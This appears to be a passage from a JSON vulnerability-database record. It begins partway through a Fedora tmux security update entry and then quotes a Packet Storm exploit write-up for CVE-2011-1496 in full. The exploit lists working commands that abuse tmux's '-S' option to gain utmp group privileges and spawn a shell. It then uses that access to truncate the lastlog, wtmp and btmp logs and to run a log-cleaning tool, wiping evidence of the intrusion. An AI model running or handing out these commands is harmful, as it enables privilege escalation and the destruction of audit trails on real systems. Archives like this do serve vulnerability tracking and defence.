to be accessed and controlled from a single terminal. tmux is intended to be a simple, modern, BSD-licensed alternative to programs such as GNU Screen. ", "modified": "2011-04-20T03:25:15", "published": "2011-04-20T03:25:15", "id": "FEDORA:A0AED110C52", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: tmux-1.4-4.fc15", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:15", "description": "", "published": "2011-04-11T00:00:00", "type": "packetstorm", "title": "tmux 1.3 / 1.4 Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1496"], "modified": "2011-04-11T00:00:00", "id": "PACKETSTORM:100272", "href": "https://packetstormsecurity.com/files/100272/tmux-1.3-1.4-Privilege-Escalation.html", "sourceData": "`--------------------------------------- \n| Team ph0x90bic proudly presents | \n| tmux -S 1.3/1.4 local utmp exploit | \n--------------------------------------- \n \n# Exploit Title: tmux '-S' Option Incorrect SetGID Local Privilege Escalation Vulnerability \n# Date: 11.04.2011 \n# Author: ph0x90bic \n# Software Link: http://tmux.sourceforge.net/ \n# Version: 1.3/1.4 \n# Tested on: Linux debian 2.6.26-1-686 \n# CVE : CVE-2011-1496 \n \n--- \n \nINTRODUCTION \n \ntmux 1.3/1.4 contains a privilege escalation vulnerabillity, \nwhich gives you utmp group privileges. This bug is important, \nbecause it is possible to clean logfiles and use logcleaners \nfor btmp, wtmp and lastlog without local root access. \n \n--- \n \nEXPLOIT \n \nExecute shell as utmp group \n \n$ tmux -S /tmp/.whateveryouwant -c id \nuid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company) \n \n$ tmux -S /tmp/.whateveryouwant -c /bin/sh \n$ id \nuid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company) \n \n-- \n \nDelete logfiles \n \n$ tmux -S /tmp/.whateveryouwant -c '> /var/log/lastlog' \n$ tmux -S /tmp/.whateveryouwant -c '> /var/log/wtmp' \n$ tmux -S /tmp/.whateveryouwant -c '> /var/log/btmp' \n \n-- \n \nUse logcleaner software \n \n$ tmux -S /tmp/.whateveryouwant -c /tmp/thcclear13/cleara hacker-username \n \n`\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/100272/tmux-escalate.txt"}]}